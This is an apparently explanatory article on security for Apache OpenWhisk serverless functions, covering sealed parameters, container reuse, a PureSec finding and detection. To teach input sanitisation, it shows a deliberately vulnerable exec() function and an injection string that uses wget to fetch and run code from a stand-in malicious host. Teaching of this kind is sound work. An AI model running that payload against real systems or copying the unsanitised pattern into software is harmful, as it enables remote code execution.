Security and Serverless Functions
Serverless computing with functions fundamentally reduces the amount of code you develop and deploy for cloud applications, eschewing the “server” parts, and allowing you to focus on just your functions. For a cloud native application, where functions are APIs, an integrated API gateway handles the routing of events and REST requests to your functions.
If you’re not yet familiar with serverless functions, I recommend my article on creating serverless functions using Apache OpenWhisk. OpenWhisk is available as a hosted service via IBM Cloud Functions and Adobe I/O Runtime, or for private deployments from vendors that include Red Hat OpenShift, and most recently WSO2.
So how does developing cloud-native applications using functions affect how you approach securing your application? In short, it doesn’t. Your functions are your code, and it is your responsibility to secure your application. There are, however, three parts to consider.
- The platform: your function will run in some compute resource, namely a Linux or Docker container, and yes it will run on a server. The value proposition behind serverless however is that you do not explicitly create, deploy, manage, or secure that container. It is the platform that takes on all of these operational burdens, and in turn, it is the platform and its operators that manage and secure a function’s compute resources. This includes ensuring your container is isolated from other containers (that are running other user functions), as well as patching the container’s image against known vulnerabilities.
- Identity management and roles: your function should adhere to the least privilege principle so that secrets shared or encoded in your functions do not allow an attacker to compromise your other assets.
- Your function, your responsibility: Your function is still your logic and it is your responsibility to make sure you follow best practices for securing your code. It is also important to consider logging and observability in this context, so that if your code is exploited, you have a way to detect the attack and perform a postmortem. Since your functions execute in resources that are not directly accessible to you, you have to think ahead of time about observability and detection as well.
When you consider that serverless functions are exposed as APIs, then it becomes evident that developers should:
- Sanitize the input parameters a function receives (a minimal sketch follows this list),
- Be cognizant of remote code exploits,
- And check dependencies for vulnerabilities they may be inheriting.
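To make the first point concrete, here is a minimal sketch of parameter validation in a JavaScript function; the allow-list regular expression is an illustrative choice on my part, not a prescribed pattern.
function main({name}) {
  // Reject anything other than a short, simple value before using it.
  if (typeof name !== 'string' || !/^[\w -]{1,64}$/.test(name)) {
    return {statusCode: 400, body: 'invalid "name" parameter'}
  }
  return {body: `hello ${name}!`}
}
For Node.js dependencies, a tool such as npm audit can report known vulnerabilities in the packages you pull in.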
These considerations are echoed in a recent podcast on serverless security with field experts Ben Kehoe of iRobot, Mx. Kas Perch and Erica Windisch of IOpipe, and Ory Segal of PureSec.
Earlier today, PureSec, a startup in the serverless security space, announced how it helped make one of the Apache OpenWhisk function runtimes more secure. Their research showed that for the affected function runtime, an attacker that successfully exploits an already vulnerable function — say by remote code execution or hijacking parameters — may replace the running code inside the container so that subsequent function invocations that reuse that container are now using the new code.
When you consider the technology stack behind serverless, it should be evident that traditional server-based code that is vulnerable to remote code exploits, or similar attacks, could be equally compromised if you run the same code using serverless functions.
Understanding the intersection between platform, function, and security.
A serverless function runs inside a container. The serverless platform does not allocate a new container for every execution of a function. This would be prohibitively expensive given today’s container technology. Instead, a function may reuse a previously allocated container (for that function) in order to amortize the cost of allocating the resources that execute the function. This container reuse is a performance optimization both from the platform provider point of view, and the function developer perspective since it lends itself to limited caching of state and data inside the container (thereby reducing expensive data store operations for example).
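To make the reuse model concrete, here is a minimal sketch (my own illustration, not part of the OpenWhisk API) of a JavaScript action that caches state in a module-level variable; the cache lives only as long as the warm container that holds it.
// Module-level state survives across invocations that land on the same warm container.
let cachedConfig = null

function main(params) {
  if (cachedConfig === null) {
    // In a real action this might be an expensive lookup against a data store.
    cachedConfig = {loadedAt: new Date().toISOString()}
  }
  // Invocations served by the same warm container will report the same timestamp.
  return {body: `config loaded at ${cachedConfig.loadedAt}`}
}
The flip side of this convenience is that anything an attacker manages to plant in a reused container can linger just as easily.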
Serverless developers should understand this underlying resource reuse model. It is also why function security today is not very different from securing cloud applications and microservices: if your function is prone to an attack, that attack can persist for an extended period of time.
It is reasonable to consider how a serverless platform provider, or even a developer using a serverless platform, may selectively configure their deployment to eschew container reuse and enforce a use-once policy for resources. This may be a worthwhile trade-off for some serverless consumers, depending on their risk assessment.
Securing function parameters.
When you write a serverless function in OpenWhisk, you are keenly aware that you are writing a function — and not creating a container. Functions accept parameters, and when the functions are exposed as APIs, the developer should be aware that their functions are now exposed to remote callers who may send invalid requests, hijack parameters, or inject code execution into their functions.
With Apache OpenWhisk, a developer can seal their parameters, making them immutable. As a result, a client request cannot override those values, and this is particularly useful when binding secrets and credentials to function parameters. This feature is enabled by default when an OpenWhisk function is exposed as an HTTP endpoint.
Here is an example function in JavaScript, which accepts a single parameter name and returns a formatted string.
function main({name}) {
  return {body: `hello ${name}!`}
}
Say this function is in a file called hello.js. You can use the OpenWhisk CLI wsk to create an HTTP endpoint called fn for the function (e.g., wsk action create fn hello.js --web true). The function is now ready to accept HTTP requests.
> curl https://guest.openwhisk/default/fn?name=reader
hello reader!
But sealing the parameters, which is done by providing values for the parameters at action creation time (e.g., wsk action update fn --param name guest), disallows all requests that try to override already bound values.
> curl https://guest.openwhisk/default/fn?name=reader
{ "error": "Request defines parameters that are not allowed." }
It is important to seal function parameters when exposing functions as HTTP endpoints, especially when dealing with secrets and credentials.
Furthermore, parameters that are used as part of an exec or system call, passed on to an SQL database, or used in eval operations should be properly sanitized, and special characters (e.g., semicolon or & for system calls) properly escaped. This helps to ensure your function does not end up executing code that you did not write or intend.
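For the SQL case in particular, parameterized queries let the database driver handle the escaping. The sketch below is illustrative only: it assumes the Node.js pg client is packaged with the action, and the users table is a made-up example.
const { Client } = require('pg')

async function main({name}) {
  // Connection settings would typically come from sealed default parameters.
  const client = new Client()
  await client.connect()
  // $1 is a bound placeholder; the driver escapes `name`, so it is never
  // concatenated into the SQL text.
  const result = await client.query('SELECT id FROM users WHERE name = $1', [name])
  await client.end()
  return {rows: result.rows}
}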
For example, consider the following function that forks a process and uses system utilities as part of its logic. For illustration, I use wc below to count the number of words in an input string.
function main({string}) {
  return new Promise(function(resolve, reject) {
    const { exec } = require('child_process')
    // The parameter is interpolated into a shell command without any sanitization.
    exec(`echo -n ${string} | wc -w`, (err, stdout, stderr) => {
      resolve({body: stdout.trim()})
    })
  })
}
This function works but is obviously insecure.
> curl https://guest.openwhisk/default/wc \
--data-urlencode "string=serverless security on your mind"
5
An attacker can exploit the unchecked use of the parameter string to execute arbitrary code, whether by replacing the function itself, as an inline process, or even a background process. Consider what happens if the vulnerable function above is invoked with the following string parameter instead: "string=; sleep 5".
Worse still, imagine the input string is the following.
; wget -O /tmp/oy http://malicous.com; /tmp/oy; ...
This malicious input allows an attacker to fetch their code from a remote location, and execute it.
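One way to harden the example above is to not hand the parameter to a shell at all. Here is one possible rewrite (a sketch, not the only fix) that validates the input and counts the words directly in JavaScript.
function main({string}) {
  // Validate the type first; then compute the word count without spawning a shell.
  if (typeof string !== 'string') {
    return {body: 'invalid input'}
  }
  const count = string.trim().split(/\s+/).filter(Boolean).length
  return {body: String(count)}
}
If you genuinely need an external utility, prefer interfaces such as execFile that pass arguments without shell interpretation, and still validate the input.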
Observability and detection.
As serverless programming evolves and matures, new tools will help fill the gap for developers in securing their functions. Until then, it is important to keep in mind that serverless means you can stop thinking about servers, not security. Apache OpenWhisk’s functions-first model means advancements in static and dynamic analysis are more readily applicable to a future ecosystem that delivers inherently more secure functions. It is important for developers at the forefront of the serverless movement to think about how they secure their code, and moreover how they can detect attacks when they occur.
There are several mechanisms in place for this today, whether you’re using Apache OpenWhisk or another serverless platform, namely logging and monitoring. Examples include establishing alerts that detect deviations in function behavior, such as very long execution times, unexpected function results, or anomalous log messages.
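As a simple illustration, a function can emit its own structured signals; in OpenWhisk, anything written to stdout or stderr is captured in the activation logs, where alerting tools can pick it up. The threshold, the message format, and the doWork placeholder below are all illustrative choices, not part of any platform API.
// A sketch of in-function instrumentation; doWork stands in for the action's real logic.
function main(params) {
  const start = Date.now()
  const result = doWork(params)  // hypothetical placeholder for the real work
  const elapsedMs = Date.now() - start
  // Log a structured warning that monitoring can alert on, e.g., unusually slow runs.
  if (elapsedMs > 1000) {
    console.log(JSON.stringify({warning: 'slow invocation', elapsedMs}))
  }
  return result
}

function doWork(params) {
  return {body: `hello ${params.name || 'world'}!`}
}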
The Apache OpenWhisk community responded quickly to the PureSec research report and audited all the runtimes that are available for functions. This includes Node.js, Python, Swift, Java, PHP, and upcoming additions Ruby and Ballerina. All of the runtimes now detect when a function is attempting to mutate itself from inside a running container (in the way described by PureSec), and uniformly generate a warning message so that the developer can observe and respond to such attempts if their functions are vulnerable to code exploits.
The Apache OpenWhisk community is growing, and the research from PureSec and the improvements to the platform that came about as a result are examples of what open communities are supposed to do — find bugs, patch them, and benefit everyone.
We announced two CVEs (Common Vulnerabilities and Exposures) for the benefit of all Apache OpenWhisk users who might be using containers directly as functions, since they may need to update their Docker dependencies. IBM Cloud Functions deployed updated runtime images as needed. Adobe I/O Runtime, which does not offer the affected images in their service, was not impacted.
The automatic management of the runtime environment for functions demonstrates the benefits of the serverless model: zero overhead to developers, and zero disruption.